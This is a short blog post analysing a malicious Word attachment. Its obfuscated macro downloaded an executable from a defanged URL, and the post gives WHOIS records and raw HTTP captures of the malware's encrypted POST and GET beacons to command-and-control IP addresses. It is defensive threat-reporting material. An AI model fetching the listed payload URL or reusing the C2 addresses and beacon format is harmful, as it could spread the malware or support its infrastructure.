I was sent a strange e-mail earlier today as a word document.
It contained a heavily obscured macro that downloaded a file:
httX://gpsbah.com/images/1.exe
gpsbah.com resolves to 173.230.242.18
NetRange 173.230.240.0 - 173.230.255.255 CIDR 173.230.240.0/20 Name ACENETMI Handle NET-173-230-240-0-1 Parent NET173 (NET-173-0-0-0-0) Net Type Direct Allocation Origin AS AS36444 AS2828 Organization ACENET, INC. (ACENE)
This is worrying – as the domain gpsbah.com seems to be associated with a card payment processor and issuer!
Global Payment Services
P.O.Box: 2110
Manama
Kingdom of Bahrain
I’ve contacted them and will update this post if they respond.
When the exe file is run and connects / exchanges encrypted or obscured data with 62.75.182.94
inetnum: 62.75.128.0 - 62.75.255.255 netname: DE-INTERGENIA-20010727 descr: PlusServer AG country: DE org: ORG-iGCK1-RIPE admin-c: TS12776-RIPE tech-c: IT1309-RIPE status: ALLOCATED PA mnt-by: RIPE-NCC-HM-MNT mnt-lower: INTERGENIA-MNT mnt-lower: MAINLAB-MNT mnt-routes: INTERGENIA-MNT mnt-routes: MAINLAB-MNT source: RIPE # Filtered
POST /gWFOZM~5MV~R%26/Sg=%7EKls%3Fc.A/%2B HTTP/1.1 Host: 62.75.182.94 Connection: Close User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Content-Type: octet/binary Accept: */* Accept-Language: q=0.8,en-US;q=0.6,en;q=0.4 Content-Length: 4962 A......CA..."......]......@_*J+0L"........JE.LKELKJKJ..K.OIJ...I.M_]......@_LOH_]......@_HKNDO_]....@_..._]...@_NO_RCA....CA\&>9<)<&0......];......]NMSM]U.EK]..P:?T]UNMSMTF0........]2.....]-...........]-...]OMLM]ULISMSJMLHSLMMMTF2.....]+0]+......?..]:....]<........]ISNSLM]UISNSLMSMTF/...-.....]>....]ULJSMSLMTF*../</]HSLM]UNOP...T]UHSLMSMTF/...9.
POST /eozHt~R~C%2CGlz/Z&SCFSHCaEe+/%3F HTTP/1.1 Host: 62.75.182.94 Connection: Close User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Content-Type: octet/binary Accept: */* Accept-Language: q=0.8,en-US;q=0.6,en;q=0.4 Content-Length: 4962 A......CA..."......]......@_*J+0L"........JE.LKELKJKJ..K.OIJ...I.M_]......@_LOH_]......@_HKNDO_]....@_..._]...@_NO_RCA....CA\&>9<)<&0......];......]NMSM]U.EK]..P:?T]UNMSMTF0........]2.....]-...........]-...]OMLM]ULISMSJMLHSLMMMTF2.....]+0]+......?..]:....]<........]ISNSLM]UISNSLMSMTF/...-.....]>....]ULJSMSLMTF*../</]HSLM]UNOP...T]UHSLMSMTF/...9.
I’ve also seen it try to POST to 208.89.214.177 but fail.
NetRange 208.89.208.0 - 208.89.215.255 CIDR 208.89.208.0/21 Name VIRPUS-KC-1 Handle NET-208-89-208-0-1 Parent NET208 (NET-208-0-0-0-0) Net Type Direct Allocation Origin AS AS32875 Organization DNSSLAVE.COM (VIRPU-1) Registration Date 2008-04-25 Last Updated 2012-03-02 Comments http://www.virpus.com
GET /V3n7%3F0i1r7/s.U87BRsV%7ESkt1f%3F7xIxYE/vtlMjyijVjnr HTTP/1.1 Host: 208.89.214.177 Connection: Close User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Content-Type: octet/binary Accept: */* Accept-Language: q=0.8,en-US;q=0.6,en;q=0.4 HTTP/1.1 403 Forbidden Server: Microsoft-IIS/8.5 Date: Tue, 21 Oct 2014 17:09:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 147 Connection: close X-Powered-By: PHP/5.5.16-1~dotdeb.1 Vary: Accept-Encoding <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> </body></html>
A full report can be found here.
thecomputerperson 
Pingback: E-mail account of company nomow.co.uk hacked | thecomputerperson